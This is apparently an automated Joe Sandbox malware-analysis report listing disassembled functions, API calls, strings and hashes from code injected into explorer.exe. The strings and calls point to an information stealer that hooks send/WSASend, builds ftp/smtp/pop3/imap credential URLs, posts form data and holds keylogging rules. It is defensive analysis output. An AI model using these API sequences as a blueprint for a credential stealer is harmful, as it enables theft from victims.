Opcode ID: 03eb3d57709bbbe045f3146c5b11d4b4d809e9d0ea16574be31f4271f622d656
Instruction ID: 2dc604f2b905a7fedc6b48742b55a2bd8e641d71abacc75b03ab81b495b549f6
Opcode Fuzzy Hash: 03eb3d57709bbbe045f3146c5b11d4b4d809e9d0ea16574be31f4271f622d656
Instruction Fuzzy Hash: 1A619C31A48314AFD720DF299D84E7BBBECEB4A754F010A58F94993241DF34D9098BB1

Function 02A2263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02A2265A
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02A22672
lstrlen.KERNEL32(?,00000000), ref: 02A2267A
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02A22685
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02A2269F
wsprintfA.USER32 ref: 02A226B6
CryptDestroyHash.ADVAPI32(?), ref: 02A226CF
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02A226D9

Strings

%02X, xrefs: 02A226B0

Memory Dump Source

Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: c855a6739344a58eeff81d9d4dd435287200e2f7e7a8409243c16087a624ff4e
Instruction ID: 375cb54e72e2da2fe6b467a477c813890740e3853ffb0620fc93cb86ee70cf31
Opcode Fuzzy Hash: c855a6739344a58eeff81d9d4dd435287200e2f7e7a8409243c16087a624ff4e
Instruction Fuzzy Hash: F7115E71E44108BFDB219B99DC88EBEBFBCEB45301F1044A1F605E2100DB358E1A9B70

Function 02A21332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02A22861: GetProcessHeap.KERNEL32(00000008,0000A000,02A210CC), ref: 02A22864
Part of subcall function 02A22861: RtlAllocateHeap.NTDLL(00000000), ref: 02A2286B

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,02A2109E,?,02A21010), ref: 02A2134A
GetCurrentProcessId.KERNEL32(00000003,?,02A2109E,?,02A21010), ref: 02A2135B
wsprintfA.USER32 ref: 02A21372

Part of subcall function 02A2263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02A2265A
Part of subcall function 02A2263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02A22672
Part of subcall function 02A2263E: lstrlen.KERNEL32(?,00000000), ref: 02A2267A
Part of subcall function 02A2263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02A22685
Part of subcall function 02A2263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02A2269F
Part of subcall function 02A2263E: wsprintfA.USER32 ref: 02A226B6
Part of subcall function 02A2263E: CryptDestroyHash.ADVAPI32(?), ref: 02A226CF
Part of subcall function 02A2263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 02A226D9

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02A21389
GetLastError.KERNEL32 ref: 02A2138F
Sleep.KERNEL32(000001F4), ref: 02A213A1

Part of subcall function 02A224D5: GetCurrentProcessId.KERNEL32 ref: 02A224E7
Part of subcall function 02A224D5: GetCurrentThreadId.KERNEL32 ref: 02A224EF
Part of subcall function 02A224D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02A224FF
Part of subcall function 02A224D5: Thread32First.KERNEL32(00000000,0000001C), ref: 02A2250D
Part of subcall function 02A224D5: CloseHandle.KERNEL32(00000000), ref: 02A22566

GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 02A213B8
GetProcAddress.KERNEL32(00000000), ref: 02A213BF
GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 02A213E4
GetProcAddress.KERNEL32(00000000), ref: 02A213EB

Part of subcall function 02A21DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 02A21E1D

RtlExitUserThread.NTDLL(00000000), ref: 02A2141D

Strings

%s%d%d%d, xrefs: 02A2136C
send, xrefs: 02A213AE
WSASend, xrefs: 02A213DA
ws2_32.dll, xrefs: 02A213B3, 02A213DF

Memory Dump Source

Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
String ID: %s%d%d%d$WSASend$send$ws2_32.dll
API String ID: 706757162-1430290102
Opcode ID: 75caf7109cce0ef13b5da0bf604653198b8b46446a61f65260aee05d8fad825b
Instruction ID: b3122b964c43629c4009012c5637c90bbb91d85cbbb118857015b56db88563ad
Opcode Fuzzy Hash: 75caf7109cce0ef13b5da0bf604653198b8b46446a61f65260aee05d8fad825b
Instruction Fuzzy Hash: 04316431BC4234B7DF206FAC9D09B7A7B56AB16701F014454F90A96591CF79C91E8BA0

Function 02A21647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(02A24220,?,?), ref: 02A21679
lstrlen.KERNEL32(?), ref: 02A21686
getpeername.WS2_32(?,?,?), ref: 02A216A0
inet_ntoa.WS2_32(?), ref: 02A216B1
htons.WS2_32(?), ref: 02A216BF
wsprintfA.USER32 ref: 02A21725

Strings

imap://%s:%s@%s:%d, xrefs: 02A216FA
pop3://%s:%s@%s:%d, xrefs: 02A21701
ftp://%s:%s@%s:%d, xrefs: 02A21708
smtp://%s:%s@%s:%d, xrefs: 02A216F3, 02A21723

Memory Dump Source

Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
API String ID: 3379139566-1703351401
Opcode ID: 5a351b428e538df55045d9bdbecb7d9306f0a42c1a43bd8a91110aac67c7ea87
Instruction ID: d187b402ca0dcd03af5b1945e8895e0065e598ba019f927266ebcae672b7512f
Opcode Fuzzy Hash: 5a351b428e538df55045d9bdbecb7d9306f0a42c1a43bd8a91110aac67c7ea87
Instruction Fuzzy Hash: A821A631F00269E79F105FAD8DC46BEBAB99B95205B0840B5ED09D3112DF35C91D8F60

Function 02A21752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,02A21539,?,?,?,02A2144B,?), ref: 02A21763
GetProcAddress.KERNEL32(00000000), ref: 02A2176A
RtlZeroMemory.NTDLL(02A24228,00000104), ref: 02A21788
RtlZeroMemory.NTDLL(02A24118,00000104), ref: 02A21790
RtlZeroMemory.NTDLL(02A24330,00000104), ref: 02A21798
RtlZeroMemory.NTDLL(02A24000,00000104), ref: 02A217A1

Strings

%s%s%s%s, xrefs: 02A217B3
ntdll.dll, xrefs: 02A2175A
sscanf, xrefs: 02A21755

Memory Dump Source

Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd

Yara matches

Similarity

API ID: MemoryZero$AddressHandleModuleProc
String ID: %s%s%s%s$ntdll.dll$sscanf
API String ID: 1490332519-278825019
Opcode ID: ba2757d8c8a9f5b9eb62fc8d74a09a3bb1874d70e833bc1210f0b8fdf8922411
Instruction ID: 7a311d4c7d3346db3ef09bc6c176590fdff8481554ac8b3457585c1de5f453bf
Opcode Fuzzy Hash: ba2757d8c8a9f5b9eb62fc8d74a09a3bb1874d70e833bc1210f0b8fdf8922411
Instruction Fuzzy Hash: 8CF08922FC037C33F52022AE7C46C57FF5CE56AEA670305D1BA0A631018DA9A80D4BF4

Function 02A224D5 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 02A224E7
GetCurrentThreadId.KERNEL32 ref: 02A224EF
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02A224FF
Thread32First.KERNEL32(00000000,0000001C), ref: 02A2250D
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02A2252C
SuspendThread.KERNEL32(00000000), ref: 02A2253C
CloseHandle.KERNEL32(00000000), ref: 02A2254B
Thread32Next.KERNEL32(00000000,0000001C), ref: 02A2255B
CloseHandle.KERNEL32(00000000), ref: 02A22566

Memory Dump Source

Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd

Yara matches

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: 855beafc1aca974bdadd973224eb7f9528efa04842b1e2d55cb561a55a79adee
Instruction ID: 18a8b843a87a7c7c51ae7460e5db2e31662f7857b5806c76e20d5a93684d50d4
Opcode Fuzzy Hash: 855beafc1aca974bdadd973224eb7f9528efa04842b1e2d55cb561a55a79adee
Instruction Fuzzy Hash: E8117371D48210EBDB209F68A45CB7EBBB8FB46701F014959F94192140DB38C91ECBB2

Function 02A21F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02A22861: GetProcessHeap.KERNEL32(00000008,0000A000,02A210CC), ref: 02A22864
Part of subcall function 02A22861: RtlAllocateHeap.NTDLL(00000000), ref: 02A2286B

Part of subcall function 02A227E2: lstrlen.KERNEL32(02A240DA,?,00000000,00000000,02A21F86,774C8A60,02A240DA,00000000), ref: 02A227EA
Part of subcall function 02A227E2: MultiByteToWideChar.KERNEL32(00000000,00000000,02A240DA,00000001,00000000,00000000), ref: 02A227FC

Part of subcall function 02A22374: RtlZeroMemory.NTDLL(?,00000018), ref: 02A22386

RtlZeroMemory.NTDLL(?,0000003C), ref: 02A21FE2
wsprintfW.USER32 ref: 02A2211B
wsprintfW.USER32 ref: 02A22186
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02A22250

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 02A221AA
POST, xrefs: 02A220CC
Host: %s, xrefs: 02A22180
Accept: */*Referer: %S, xrefs: 02A22111

Memory Dump Source

Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd

Yara matches

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: bc8df1d9a694015df024925beaf73294a5ffdd2163044572cee991522addfdc5
Instruction ID: 0388657d10c1f750f9d7f13d37ab60796dc6bf0839096ec4c15288916a3dd1b1
Opcode Fuzzy Hash: bc8df1d9a694015df024925beaf73294a5ffdd2163044572cee991522addfdc5
Instruction Fuzzy Hash: ACA15871A48325AFD720DF689884B2BBBE9BB89344F10092DF985D3250DF75D90DCB62

Function 02A225AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(00000400,00000000,?,774CE800,?,?,microsoftedgecp.exe,02A21287), ref: 02A225BF
IsWow64Process.KERNEL32(000000FF,?), ref: 02A225D1
IsWow64Process.KERNEL32(00000000,?), ref: 02A225E4
CloseHandle.KERNEL32(00000000), ref: 02A225FA

Strings

microsoftedgecp.exe, xrefs: 02A225AD

Memory Dump Source

Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd

Yara matches

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID: microsoftedgecp.exe
API String ID: 331459951-1475183003
Opcode ID: d817add762090fadf29137f53fe06bf26915e0e521dbdd37961b3fc52cfa02f5
Instruction ID: 7c467adaa6656acaec9075b7d3bd879479e08b05990cb32dfd25fc4e6a540f4c
Opcode Fuzzy Hash: d817add762090fadf29137f53fe06bf26915e0e521dbdd37961b3fc52cfa02f5
Instruction Fuzzy Hash: 17F09072D46228FF9B20CF9899989FE777CEB02355B1442AAFD0092140DB358F09E6B0

Function 02A21B17 Relevance: 6.1, APIs: 4, Instructions: 101
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 02A21B4E
LoadLibraryA.KERNEL32(?,02A24434,00000000,00000000,774D2EE0,00000000,02A21910,?,?,?,00000001,?,00000000), ref: 02A21B76
GetProcAddress.KERNEL32(00000000,-00000002), ref: 02A21BA3
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02A21BF4

Memory Dump Source

Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd

Yara matches

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: ff71cd99ec87b90de7cec175d9a80f09fafc198a7df9768172841eb524aa3d37
Instruction ID: becd1c1c26cd53cc8b29c36f408675f686c4e854f1f3da3a5e38e0a8bfd69317
Opcode Fuzzy Hash: ff71cd99ec87b90de7cec175d9a80f09fafc198a7df9768172841eb524aa3d37
Instruction Fuzzy Hash: DD318375700225ABCB24CF2DC8C4B76B7F8EF05319B15456DE94AC7602EB35E85ACBA0

Analysis Process: explorer.exePID: 4072, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0014355C Relevance: 1.6, APIs: 1, Instructions: 73
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 001435D8

Memory Dump Source

Source File: 0000001C.00000002.2534653037.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_141000_explorer.jbxd

Yara matches

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction ID: efde287ca869b35571563247abfd353dc96a7a8b0ed6707cd44fcfcc0ba01fd1
Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction Fuzzy Hash: 78115430615E095FEB58FBB898AD27937A0EB65301F54452AA429C76B1DB398A41C701

Function 00143220 Relevance: 7.7, APIs: 5, Instructions: 241
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00143266
Process32First.KERNEL32 ref: 00143289
Process32Next.KERNEL32 ref: 00143532
CloseHandle.KERNELBASE ref: 00143543
SleepEx.KERNELBASE ref: 0014354E

Memory Dump Source

Source File: 0000001C.00000002.2534653037.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_141000_explorer.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
String ID:
API String ID: 2482764027-0
Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction ID: f39b04ef052b0c3d8728d0a1cc5950680e9c3b9543529b71b6912a72ec38b370
Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction Fuzzy Hash: 3B8131312186088FE71AEF54EC58BEAB7A1FB51740F54462AA457C71B0EF78DA08CF81

Function 0014A048 Relevance: 4.7, APIs: 3, Instructions: 223
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0014A147
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0014A1BB
VirtualProtect.KERNELBASE ref: 0014A1D9

Memory Dump Source

Source File: 0000001C.00000002.2534653037.0000000000147000.00000040.80000000.00040000.00000000.sdmp, Offset: 00147000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_147000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction ID: f518b31bd2edf58260fb9bee1feb1a75e172fb027cae29ad9b437d35c57481e1
Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction Fuzzy Hash: 19518D323D891D0BCB28AB3C9CD06F5B7C1EF59325F96072AD08AC32A4D759D8468383

Analysis Process: explorer.exePID: 6160, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	14.9%
Dynamic/Decrypted Code Coverage:	97.6%
Signature Coverage:	18.6%
Total number of Nodes:	333
Total number of Limit Nodes:	7

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00151016 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 193
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00152724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,001529F3,-00000001,0015128C), ref: 00152731

Part of subcall function 00152A09: GetProcessHeap.KERNEL32(00000008,0000A000,001510BF), ref: 00152A0C
Part of subcall function 00152A09: RtlAllocateHeap.NTDLL(00000000), ref: 00152A13

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00151038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 0015106C
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00151075
GetCurrentProcessId.KERNEL32(?,00151010), ref: 0015107B
wsprintfA.USER32 ref: 001510E7
RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00151155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00151160
Process32First.KERNEL32(00000000,?), ref: 0015117F
CharLowerA.USER32(?), ref: 00151199
lstrcmpiA.KERNEL32(?,explorer.exe), ref: 001511B5
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00151212
Process32Next.KERNEL32(00000000,00000128), ref: 0015126C
CloseHandle.KERNELBASE(00000000), ref: 0015127F
Sleep.KERNELBASE(000003E8), ref: 0015129F

Strings

microsoftedgecp.exe, xrefs: 00151208
explorer.exe, xrefs: 001511AB
keylog_rules=, xrefs: 0015110D
%s%s, xrefs: 001510E1
0-gwP,gw, xrefs: 00151075
|:|, xrefs: 00151125

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
String ID: %s%s$0-gwP,gw$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3206029838-1042237000
Opcode ID: 204bc71d99b49e077968bc2599fdb285d2e10d7aa7264a181ac056647d663afe
Instruction ID: 83d1d87f04e0612a21d630331060ae7d482e2acddbfeb51c713951f9e29dfaeb
Opcode Fuzzy Hash: 204bc71d99b49e077968bc2599fdb285d2e10d7aa7264a181ac056647d663afe
Instruction Fuzzy Hash: 0F51F531204300EBC715EF70DC98A7A77AAEB55753F100628FD758F6E1EB349A8D8A61

Function 001510A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00152A09: GetProcessHeap.KERNEL32(00000008,0000A000,001510BF), ref: 00152A0C
Part of subcall function 00152A09: RtlAllocateHeap.NTDLL(00000000), ref: 00152A13

wsprintfA.USER32 ref: 001510E7

Part of subcall function 0015276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00152777
Part of subcall function 0015276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,001510FE), ref: 00152789

RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00151155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00151160
Process32First.KERNEL32(00000000,?), ref: 0015117F
CharLowerA.USER32(?), ref: 00151199
lstrcmpiA.KERNEL32(?,explorer.exe), ref: 001511B5
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00151212
Process32Next.KERNEL32(00000000,00000128), ref: 0015126C
CloseHandle.KERNELBASE(00000000), ref: 0015127F
Sleep.KERNELBASE(000003E8), ref: 0015129F

Strings

microsoftedgecp.exe, xrefs: 00151208
explorer.exe, xrefs: 001511AB
keylog_rules=, xrefs: 0015110D
%s%s, xrefs: 001510E1
|:|, xrefs: 00151125

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3018447944-2805246637
Opcode ID: 4071634a63e7de8ef737af36a43aadab8a8af76dd2fa5936fe86449b77c688f8
Instruction ID: 986390ebafcb242557c084c17a57d06d141a8fc150e4f492da782f5f5512c195
Opcode Fuzzy Hash: 4071634a63e7de8ef737af36a43aadab8a8af76dd2fa5936fe86449b77c688f8
Instruction Fuzzy Hash: 7F41C331204304EBC715AF748C85A3A77AAAB95787F100A2CFD718F2D1EB349E4D8A61

Function 00159AE0 Relevance: 6.2, APIs: 4, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000158000.00000040.80000000.00040000.00000000.sdmp, Offset: 00158000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_158000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c042051a4316af95e6db2e33ed4a8c4f3ee85d51b8b0f0f4500bd5334e5e81e
Instruction ID: 0cc462f5ac0943fbc4d60f618c75aecfbd516f4ae8548bcefc2df28eab80c648
Opcode Fuzzy Hash: 6c042051a4316af95e6db2e33ed4a8c4f3ee85d51b8b0f0f4500bd5334e5e81e
Instruction Fuzzy Hash: B85109B1A44252CBE7218A78DC80BB4B794EB51322B280739DDF6CF3C5E794580EC792

Function 0015276D Relevance: 3.0, APIs: 2, Instructions: 23
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00152777
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,001510FE), ref: 00152789

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 0abb2dff01804e31d28d6fbdefbb92610e79ea8adf99ea560c8dbde28b9ebf89
Instruction ID: 56f7c24d5de4b322a3fbee693bba5e57994e2505f266ff04c8fd4fc71bd76cc6
Opcode Fuzzy Hash: 0abb2dff01804e31d28d6fbdefbb92610e79ea8adf99ea560c8dbde28b9ebf89
Instruction Fuzzy Hash: D6D01732701331BBE3745A7B6C0CF83AE9DDF86AF2B010025B91DD7190D6608810C2F0

Function 00152A09 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,001510BF), ref: 00152A0C
RtlAllocateHeap.NTDLL(00000000), ref: 00152A13

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 95a4684d8bac678dcdb0dd0f6a43987ad42c4037b1c80039d0a69228ece358d1
Instruction ID: c009171768f83958ece6f78f2d1557d9c71ddde3e049e8dc67002dc0af7d61e0
Opcode Fuzzy Hash: 95a4684d8bac678dcdb0dd0f6a43987ad42c4037b1c80039d0a69228ece358d1
Instruction Fuzzy Hash: F0A002B1650300EFDD4557A49D0DF197658A744743F0045447256CE4D09D7555949731

Function 001529BD Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,001512D9,00000000,00000000,?,00000001), ref: 001529C7

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 21e72b4062f869762303fd0d7d87732191f61ac197bdbe0e6ac60b42694222f8
Instruction ID: 36f2e54e57c15fbf15f6b1c5667d8e08a9316901f537aca88e14ea9a25d85062
Opcode Fuzzy Hash: 21e72b4062f869762303fd0d7d87732191f61ac197bdbe0e6ac60b42694222f8
Instruction Fuzzy Hash: 24A002B07D6300FAFD6997519D1FF152A189740F53F104144B31A7D5D056E4B640853D

Function 001529AE Relevance: 1.3, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,001513A4), ref: 001529B6

Memory Dump Source

Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_151000_explorer.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 41d11e5889725787d4880c49af93ab6caf830ef2bfa2a3506cfde154bb85223b
Instruction ID: cc6a002c41528113d8d1fe0cc08d6304334f47617e0ebd3b9d234278b1190542
Opcode Fuzzy Hash: 41d11e5889725787d4880c49af93ab6caf830ef2bfa2a3506cfde154bb85223b
Instruction Fuzzy Hash: E2A00270790700B6ED7557205D0EF0966546740B43F2049447255AE4D049A5A1888A18

Non-executed Functions

Function 001518BF Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00152724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,001529F3,-00000001,0015128C), ref: 00152731

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 001518F4
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 0015192F
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001519BF
RtlMoveMemory.NTDLL(00000000,00153638,00000016), ref: 001519E6
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00151A0E
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00151A1E
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00151A38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00151A40
